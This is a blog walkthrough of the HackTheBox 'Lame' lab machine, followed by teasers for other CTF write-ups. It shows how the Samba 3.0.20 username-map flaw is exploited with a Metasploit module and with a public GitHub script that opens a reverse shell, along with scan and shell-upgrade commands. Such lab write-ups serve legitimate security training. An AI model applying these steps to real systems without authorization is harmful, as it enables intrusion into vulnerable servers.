Skip to main content

HTB LAME WALKTHROUGH




HackTheBox is an excellent platform for various pen-testers to increase their testing skills and increasing knowledge.

Machine Level -Easy
Machine Name -Lame
Machine OS -Linux
Machine IP -10.10.10.3

Tools:
Nmap -Nmap is a fantastic tool for scanning open ports, services, and OS detection. You can use other tools other than Nmap (whichever you are more comfortable with ) like Masscan, SPARTA, etc to scan for open ports.
Metasploit -One of the most common and widely used tools by pen-testers to launch exploits, it is maintained by Rapid 7. Many books are available to understand the features of this tool.
We will be performing the attack by two methodologies (using and without using Metasploit).

Methodology 1 (using Metasploit)
Scanning the machine is the first step(i.e. Enumeration). We use the following Nmap command,
nmap -sSVC 10.10.10.3


 (we can run the command with sudo privileges if an error occurs regarding privileges.)
The command scans for only open ports or services, this method of scanning narrows down the search list and takes comparatively less time to scan as compared to scanning for all ports.

We get the following result.


So let's analyze our scan. Now if you are doing a real-time pen test then you must see through each port. But for now, we look for the juiciest vulnerability, and it's smb.
As soon as you see an smb , fire up your Metasploit (type msfconsole in terminal), and search for smb version through the command search smb_version


You will see one matching module, type use 0 to use the module,
Now set your target IP using the command set rhosts 10.10.10.3 and then run the module by typing run or exploit command.
After successful execution, you will see some information disclosure.
So it says it's a Unix Samba 3.0.20-Debian. Search for its exploit on Google and, you will find a Rapid 7 module.
Link here:
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script


Scroll down and you will see the module, copy it and run it.
As usual set your target IP using the command set rhosts 10.10.10.3 and run the exploit.


Wait for your exploit to trigger.


Exploit worked and you got a shell. You are in the system now. Move around the files to find flags and other files.
Here's an example,
For root flags,


For user flag,


So that's it for this machine. We were able to get both the root flag and the user flag.

***************************************************************************************************************************

Now we can do this task without using Metasploit.

Methodology 2(without using Metasploit)

The first step is always the same. Use Nmap to scan the host.


 In the Nmap results we can see port 139 is open, this is related to Samba smbd 3.X - 4.X.
We can search for a Python script to run against this version on GitHub.
Link here:
https://github.com/amriunix/CVE-2007-2447

We run the script using command python username_script.py <RHOST> <RPORT> <LHOST> <LPORT> ,
Here,
  • RHOST - The target IP
  • RPORT - The target port (TCP 139)
  • LHOST - The listening host
  • LPORT - The listening port


Open a listening port on your end to listen, before running the script against the machine.
Use Netcat tool command to open a listening port :


After you run the python script you will get connected to the machine.
To use it much more easily and neatly we use the command 
python -c 'import pty; pty.spawn("/bin/sh")'
NOTE: "sh is a unique sub-process wrapper. It gives you flexibility and features of bash."


Now you can move around in the system to search for root and user flags.
Here's the path for the user flag :


And here's  the root flag :


We were successful in gaining access to the user and root flag through both methods.

Thank you!


Comments

Post a Comment

Popular posts from this blog

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT

Kioptrix Level 1 is a beginner level CTF challenge. You can download this virtual machine from here .  Details of Kioptrix : Size----186 MB OS---Linux Note: In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network. Fire-up both the machines(Kali and Kioptrix Level 1) Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself. Leave the Kioptrix machine as it is and switch to Kali. First we need to find the IP address of the Kioptrix machine. We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address. Command   sudo netdiscover -i eth0 Wait  for scan results. 192.168.233.130 seems to be the IP of the Kioptrix machine. Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine) Command  sudo nmap
1 comment
Read more

HTB GRANDPA WALKTHROUGH

HackTheBox  is an excellent platform for various pen-testers to increase their testing skills and knowledge. Machine Level -Easy Machine Name -Grandpa Machine OS -Windows Machine IP -10.10.10.14 Tools: Nmap  -Nmap is a fantastic tools for scanning the open ports, services and OS detection. You can use other tools other than nmap (which ever you are more comfortable with ) like masscan, SPARTA etc to scan for open ports. Metasploit  -One of the most common and widely used tool by pen-testers to launch exploits, it is maintained by Rapid 7 . Many books are available to understand the features of this tool. Method : Scanning the machine is the first step(i.e. Enumeration). We use the following nmap command, sudo nmap -T4 -p- -A 10.10.10.14 The command  scans for all ports(-p-) with threads speed 4 (-T4) and also gives you version details  (-A). So, only port 80 is open. Its says its running Microsoft IIS 6.0 , but first lets visit the victim's IP and see what's there
Post a Comment
Read more

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named secret.txt
Post a Comment
Read more